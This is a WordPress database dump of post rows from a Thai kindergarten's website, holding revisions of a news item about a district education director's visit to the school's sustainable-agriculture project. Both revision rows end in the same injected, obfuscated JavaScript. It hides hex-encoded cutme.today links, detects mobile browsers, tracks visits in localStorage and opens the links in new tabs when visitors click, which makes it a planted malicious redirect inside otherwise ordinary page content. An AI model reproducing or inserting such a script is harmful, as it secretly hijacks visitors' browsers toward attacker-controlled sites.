(368,2,'2024-09-12 13:29:56','2024-09-12 06:29:56','','458225254_122175360044202781_5522903753949252187_n','','inherit','open','closed','','458225254_122175360044202781_5522903753949252187_n','','','2024-09-12 13:29:56','2024-09-12 06:29:56','',367,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/458225254_122175360044202781_5522903753949252187_n.jpg',0,'attachment','image/jpeg',0),
(369,2,'2024-09-12 13:31:52','2024-09-12 06:31:52','<!-- wp:paragraph -->\n<p>เมื่อวันที่ 31 สิงหาคม 2567 นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้นิเทศ และตรวจเยี่ยมโรงเรียนอนุบาลวัดพระโต โดยมีนายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนให้การต้อนรับ ได้เยี่ยมชมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโต</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>โรงเรียนอนุบาลวัดพระโตได้น้อมนำปรัชญาของเศรษฐกิจพอเพียงมาบูรณาการจัดการเรียนรู้ เพื่อพัฒนาคุณภาพผู้เรียน ตามรอยพระบาทศาสตร์พระราชา <a></a>โคกหนองนาโมเดล และได้เข้าร่วมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน สืบสานพระราชเสาวนีย์ของสมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง โดยได้รับการสนับสนุนจากวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ และการไฟฟ้าฝ่ายผลิตแห่งประเทศไทย ทำให้ได้รับรางวัลรองชนะเลิศอันดับ 2 ระดับประเทศ และรางวัลรองชนะเลิศอันดับ 1 ระดับประเทศ ในโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน ประเภทโรงเรียนที่ได้รับความรู้จากวิทยาลัยและใช้ได้ผลดีเด่น ในปี 2565 และในปี 2567 ตามลำดับ <img height=\"16\" width=\"16\" alt=\"?\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t5d/2/16/1f3c6.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/container -->\n<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"?\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t8/2/16/1f331.png\"> “โคกหนองนา โรงเรียนอนุบาลวัดพระโต” เป็นแหล่งเรียนรู้ให้กับครู นักเรียน และผู้ที่สนใจเดินทางมาศึกษาดูงานมากมาย</p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"978ada18\",\"mediaId\":368,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-978ada18\"><img class=\"gb-image gb-image-978ada18\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458225254_122175360044202781_5522903753949252187_n.jpg\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโต','','inherit','closed','closed','','367-revision-v1','','','2024-09-12 13:31:52','2024-09-12 06:31:52','',367,'http://watprato.ssk.in.th/?p=369',0,'revision','',0),
(370,2,'2024-09-12 13:34:00','2024-09-12 06:34:00','<!-- wp:paragraph -->\n<p>เมื่อวันที่ 31 สิงหาคม 2567 นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้นิเทศ และตรวจเยี่ยมโรงเรียนอนุบาลวัดพระโต โดยมีนายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนให้การต้อนรับ ได้เยี่ยมชมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโต</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>โรงเรียนอนุบาลวัดพระโตได้น้อมนำปรัชญาของเศรษฐกิจพอเพียงมาบูรณาการจัดการเรียนรู้ เพื่อพัฒนาคุณภาพผู้เรียน ตามรอยพระบาทศาสตร์พระราชา <a></a>โคกหนองนาโมเดล และได้เข้าร่วมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน สืบสานพระราชเสาวนีย์ของสมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง โดยได้รับการสนับสนุนจากวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ และการไฟฟ้าฝ่ายผลิตแห่งประเทศไทย ทำให้ได้รับรางวัลรองชนะเลิศอันดับ 2 ระดับประเทศ และรางวัลรองชนะเลิศอันดับ 1 ระดับประเทศ ในโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน ประเภทโรงเรียนที่ได้รับความรู้จากวิทยาลัยและใช้ได้ผลดีเด่น ในปี 2565 และในปี 2567 ตามลำดับ <img height=\"16\" width=\"16\" alt=\"?\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t5d/2/16/1f3c6.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"37373c23\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"?\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t8/2/16/1f331.png\"> “โคกหนองนา โรงเรียนอนุบาลวัดพระโต” เป็นแหล่งเรียนรู้ให้กับครู นักเรียน และผู้ที่สนใจเดินทางมาศึกษาดูงานมากมาย</p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"978ada18\",\"mediaId\":368,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-978ada18\"><img class=\"gb-image gb-image-978ada18\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458225254_122175360044202781_5522903753949252187_n.jpg\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโต','','inherit','closed','closed','','367-revision-v1','','','2024-09-12 13:34:00','2024-09-12 06:34:00','',367,'http://watprato.ssk.in.th/?p=370',0,'revision','',0),
